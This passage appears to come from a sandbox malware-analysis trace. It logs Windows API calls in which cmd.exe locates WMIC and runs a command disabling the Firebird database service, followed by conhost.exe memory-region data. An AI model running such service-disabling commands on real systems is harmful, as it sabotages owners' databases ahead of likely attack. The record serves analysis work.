lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0113.522] GetConsoleOutputCP () returned 0x1b5 [0113.522] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0113.522] GetUserDefaultLCID () returned 0x409 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4acf8ac, cchData=128 | out: lpLCData="0") returned 2 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4acf8ac, cchData=128 | out: lpLCData="0") returned 2 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4acf8ac, cchData=128 | out: lpLCData="1") returned 2 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0113.522] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0113.522] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0113.523] GetConsoleTitleW (in: lpConsoleTitle=0x4c5ab00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0113.524] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0113.524] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0113.524] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0113.524] GetEnvironmentVariableW (in: lpName="Firebird", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.524] _wcsicmp (_String1="Firebird", _String2="CD") returned 3 [0113.524] _wcsicmp (_String1="Firebird", _String2="ERRORLEVEL") returned 1 [0113.524] _wcsicmp (_String1="Firebird", _String2="CMDEXTVERSION") returned 3 [0113.524] _wcsicmp (_String1="Firebird", _String2="CMDCMDLINE") returned 3 [0113.524] _wcsicmp (_String1="Firebird", _String2="DATE") returned 2 [0113.524] _wcsicmp (_String1="Firebird", _String2="TIME") returned -14 [0113.524] _wcsicmp (_String1="Firebird", _String2="RANDOM") returned -12 [0113.524] _wcsicmp (_String1="Firebird", _String2="HIGHESTNUMANODENUMBER") returned -2 [0113.525] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0113.525] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0113.525] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0113.525] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0113.525] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0113.525] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0113.525] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0113.526] GetConsoleTitleW (in: lpConsoleTitle=0x4acf598, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.526] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0113.526] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0113.526] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0113.526] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0113.526] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0113.526] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0113.526] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0113.526] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0113.527] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0113.527] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0113.527] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0113.527] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0113.527] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0113.527] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0113.527] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0113.527] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0113.527] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0113.527] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0113.527] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0113.527] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0113.527] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0113.527] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0113.527] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0113.527] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0113.527] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0113.527] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0113.527] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0113.527] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0113.527] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0113.527] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0113.527] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0113.527] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0113.527] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0113.527] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0113.527] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0113.527] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0113.527] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0113.527] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0113.527] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0113.527] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0113.527] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0113.527] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0113.527] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0113.527] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0113.527] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0113.527] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0113.527] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0113.527] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0113.527] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0113.527] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0113.527] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0113.527] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0113.527] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0113.527] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0113.528] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0113.528] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0113.528] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0113.528] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0113.528] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0113.528] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0113.528] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0113.528] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0113.528] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0113.528] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0113.528] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0113.528] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0113.528] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0113.528] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0113.528] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0113.528] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0113.528] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0113.528] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0113.528] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0113.528] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0113.528] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0113.528] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0113.528] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0113.528] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0113.528] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0113.528] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0113.528] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0113.528] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0113.528] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0113.528] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0113.528] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0113.528] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0113.528] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0113.528] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0113.529] SetErrorMode (uMode=0x0) returned 0x0 [0113.529] SetErrorMode (uMode=0x1) returned 0x0 [0113.529] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4c505d0, lpFilePart=0x4acf0a4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4acf0a4*="Desktop") returned 0x1d [0113.529] SetErrorMode (uMode=0x0) returned 0x1 [0113.529] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0113.529] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0113.534] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.535] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.535] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4acee30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4acee30) returned 0xffffffff [0113.536] GetLastError () returned 0x2 [0113.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.536] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4acee30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4acee30) returned 0xffffffff [0113.536] GetLastError () returned 0x2 [0113.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4acee30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4acee30) returned 0xffffffff [0113.536] GetLastError () returned 0x2 [0113.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4acee30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4acee30) returned 0xffffffff [0113.536] GetLastError () returned 0x2 [0113.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4acee30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4acee30) returned 0x4c5b2d0 [0113.536] FindClose (in: hFindFile=0x4c5b2d0 | out: hFindFile=0x4c5b2d0) returned 1 [0113.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x4acee30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4acee30) returned 0xffffffff [0113.537] GetLastError () returned 0x2 [0113.537] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x4acee30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4acee30) returned 0x4c5b2d0 [0113.537] FindClose (in: hFindFile=0x4c5b2d0 | out: hFindFile=0x4c5b2d0) returned 1 [0113.537] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0113.537] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0113.537] GetConsoleTitleW (in: lpConsoleTitle=0x4acf324, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.537] InitializeProcThreadAttributeList (in: lpAttributeList=0x4acf250, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4acf234 | out: lpAttributeList=0x4acf250, lpSize=0x4acf234) returned 1 [0113.537] UpdateProcThreadAttribute (in: lpAttributeList=0x4acf250, dwFlags=0x0, Attribute=0x60001, lpValue=0x4acf23c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4acf250, lpPreviousValue=0x0) returned 1 [0113.537] GetStartupInfoW (in: lpStartupInfo=0x4acf288 | out: lpStartupInfo=0x4acf288*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0113.537] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0113.538] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0113.538] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0113.539] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4acf1d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4acf224 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x4acf224*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xed4, dwThreadId=0xed8)) returned 1 [0113.545] CloseHandle (hObject=0xa4) returned 1 [0113.545] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0113.546] GetEnvironmentStringsW () returned 0x4c59f78* [0113.546] FreeEnvironmentStringsA (penv="=") returned 1 [0113.546] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0114.410] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4acf1bc | out: lpExitCode=0x4acf1bc*=0x0) returned 1 [0114.410] CloseHandle (hObject=0xa8) returned 1 [0114.410] _vsnwprintf (in: _Buffer=0x4acf2a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x4acf1c4 | out: _Buffer="00000000") returned 8 [0114.410] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0114.410] GetEnvironmentStringsW () returned 0x4c5b400* [0114.411] FreeEnvironmentStringsA (penv="=") returned 1 [0114.411] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0114.411] GetEnvironmentStringsW () returned 0x4c5b400* [0114.411] FreeEnvironmentStringsA (penv="=") returned 1 [0114.411] DeleteProcThreadAttributeList (in: lpAttributeList=0x4acf250 | out: lpAttributeList=0x4acf250) [0114.411] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.411] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0114.411] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.411] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0114.412] _get_osfhandle (_FileHandle=0) returned 0x38 [0114.412] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0114.412] SetConsoleInputExeNameW () returned 0x1 [0114.412] GetConsoleOutputCP () returned 0x1b5 [0114.412] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0114.412] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.412] exit (_Code=0) Thread: id = 239 os_tid = 0xed0 Process: id = "50" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x76cf8000" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0xeb0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3259 start_va = 0x7fd8a000 end_va = 0x7fd8afff entry_point = 0x0 region_type = private name = "private_0x000000007fd8a000" filename = "" Region: id = 3260 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3261 start_va = 0xa5b7130000 end_va = 0xa5b714ffff entry_point = 0x0 region_type = private name = "private_0x000000a5b7130000" filename = "" Region: id = 3262 start_va = 0xa5b7150000 end_va = 0xa5b7163fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5b7150000" filename = "" Region: id = 3263 start_va = 0xa5b7170000 end_va = 0xa5b71affff entry_point = 0x0 region_type = private name = "private_0x000000a5b7170000" filename = "" Region: id = 3264 start_va = 0x7df5ff330000 end_va = 0x7ff5ff32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff330000" filename = "" Region: id = 3265 start_va = 0x7ff6c4350000 end_va = 0x7ff6c4372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4350000" filename = "" Region: id = 3266 start_va = 0x7ff6c437c000 end_va = 0x7ff6c437dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c437c000" filename = "" Region: id = 3267 start_va = 0x7ff6c437e000 end_va = 0x7ff6c437efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c437e000" filename = "" Region: id = 3268 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3269 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3270 start_va = 0xa5b7200000 end_va = 0xa5b72fffff entry_point = 0x0 region_type = private name = "private_0x000000a5b7200000" filename = "" Region: id = 3271 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3272 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3273 start_va = 0xa5b7130000 end_va = 0xa5b713ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5b7130000" filename = "" Region: id = 3274 start_va = 0xa5b7140000 end_va = 0xa5b7146fff entry_point = 0x0 region_type = private name = "private_0x000000a5b7140000" filename = "" Region: id = 3275 start_va = 0xa5b71b0000 end_va = 0xa5b71effff entry_point = 0x0 region_type = private name = "private_0x000000a5b71b0000" filename = "" Region: id = 3276 start_va = 0xa5b71f0000 end_va = 0xa5b71f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5b71f0000" filename = "" Region: id = 3277 start_va = 0xa5b7300000 end_va = 0xa5b73bdfff entry_point = 0xa5b7300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3278 start_va = 0xa5b73c0000 end_va = 0xa5b73c6fff entry_point = 0x0 region_type = private name = "private_0x000000a5b73c0000" filename = "" Region: id = 3279 start_va = 0xa5b73d0000 end_va = 0xa5b73d0fff entry_point = 0x0 region_type = private name = "private_0x000000a5b73d0000" filename = "" Region: id = 3280 start_va = 0xa5b73e0000 end_va = 0xa5b73e0fff entry_point = 0x0 region_type = private name = "private_0x000000a5b73e0000" filename = "" Region: id = 3281 start_va = 0xa5b74c0000 end_va = 0xa5b74cffff entry_point = 0x0 region_type = private name = "private_0x000000a5b74c0000" filename = "" Region: id = 3282 start_va = 0xa5b74d0000 end_va = 0xa5b7657fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5b74d0000" filename = "" Region: id = 3283 start_va = 0xa5b7660000 end_va = 0xa5b77e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5b7660000" filename = "" Region: id = 3284 start_va = 0xa5b77f0000 end_va = 0xa5b8beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5b77f0000" filename = "" Region: id = 3285 start_va = 0x7ff6c4250000 end_va = 0x7ff6c434ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4250000" filename = "" Region: id = 3286 start_va = 0x7ff6c437a000 end_va = 0x7ff6c437bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c437a000" filename = "" Region: id = 3287 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3288 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3289 